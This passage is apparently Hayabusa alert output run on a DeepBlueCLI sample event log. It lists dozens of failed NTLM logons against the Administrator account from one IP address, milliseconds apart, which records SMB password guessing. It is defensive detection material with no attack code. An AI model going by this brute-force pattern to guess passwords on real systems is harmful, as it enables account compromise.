+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: usugjEEBHlhJvOyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQ1pM2CVLt5ITVD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.746 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NIboW7hNljF3HPpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.795 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOk5W4rkSYRRw4xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.858 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJTfcwd8rnFc06iF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.930 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sm415W5zkvjdnTV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:46.981 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KEiSbtlmW4ou1mc7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.012 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xWeZV5pHt94adwUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5np7HeCPAFTDdTXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gXbe2jEJVtwaQXlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.134 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hZFiUCJnaBdHcw4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.176 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a71wyo41KV1ZoT7p | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogB17WdeOiC19rqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.286 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ANOLPWG12lkW39Ei | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.332 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y1vf7OUxb6TH3Q4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.368 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxU5yumSieUzSgzH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.401 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9K5EoWWASU8SlSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.445 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PwZLRPFxaFWwjZEe | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.500 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8fXgFFb3HTMunsoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.549 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R1RozAr1uhux4cYW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.586 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7EmuUSv03RnhKsF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jw410HEW8EC3MC9f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTYp8cEbt3Yggo3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.727 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
yWJVzgYLWIo7SGCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.773 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DP13jPdW5Gdl8z56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LNXOWjHmMDhfFVon | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.908 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kka1RiF3f7Nhkf8x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.959 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2o90lG6attzWU4ZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.998 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PyPK9kuJdflQ4RKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.028 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: a9I3El7d7anR0kIz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDUMTEfNhFuuqMle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.110 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e0F70d1WstkqnQgA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bm0txApQSp1U42N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JeEe5ENSIZnfc3FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oasE54Z1FlpswY0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.277 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Bhje1BgvxOlG28JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.321 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9iTIv4UQ4En9RA2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.356 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mg8KFm1lCeImj8Sb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.400 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h17Fz1s6GJki61jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.440 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Pjjn4FAkJn4h32r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.483 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARVx3FAAww8Gmfvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.533 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: sYIwPg5k1wpvWobN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.572 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0sfhYQ54SjC4JTX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nfZYnUPV40FShcqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XYbvWVCT0tFixZTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XC6Vmz0ql8myDuGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.744 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJ8JvuvZZzwSOzFo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.784 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s06yKaogI6FYkXla | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.828 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCjOc7PguxwNKoQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.876 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BX5IosnpdYZK5xZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.905 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfMjB1epEm64wVEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.947 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb4FVO2SKsoMyt1K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.003 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1qoRw2jjFx4F6Wx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:49.048 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ImiLeiteLoSw32I0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.083 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcIYD47BIEP8gB0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lUAeB15aWamcaZ8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFOKiSDWc1dWjzge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.211 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hqyMtzjKSJEtEAdx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.251 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtHsItpyFHQxvLWm | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.287 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RdGMqIhUGHj23Xm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfE5LVmrPaAFLwBR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.368 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1swKSla5gkdOwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.408 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kL9MdVnRVogiP7hF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.456 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aQ0hRdwZvC5PBcXl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.497 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ctbv73J0Dot9raD0 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wKpWApJIKkjbtaPB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.590 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kVTAv9VoNpUyxQFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.642 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xb3t1dpuk9JZri5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fy0UrW8TWrxAOX90 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iUXUbUsiE6Ahh9iD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
2QQdQ6rQYLBf15AF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.820 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zG4eJLuQ4u2dKQG0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.854 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCfwHs2gVGiRc3Fy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.897 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67TcwQfTxgTtQvCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imnSPKAKYzrCKSUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.024 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMNbdjiXNUY0gTfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
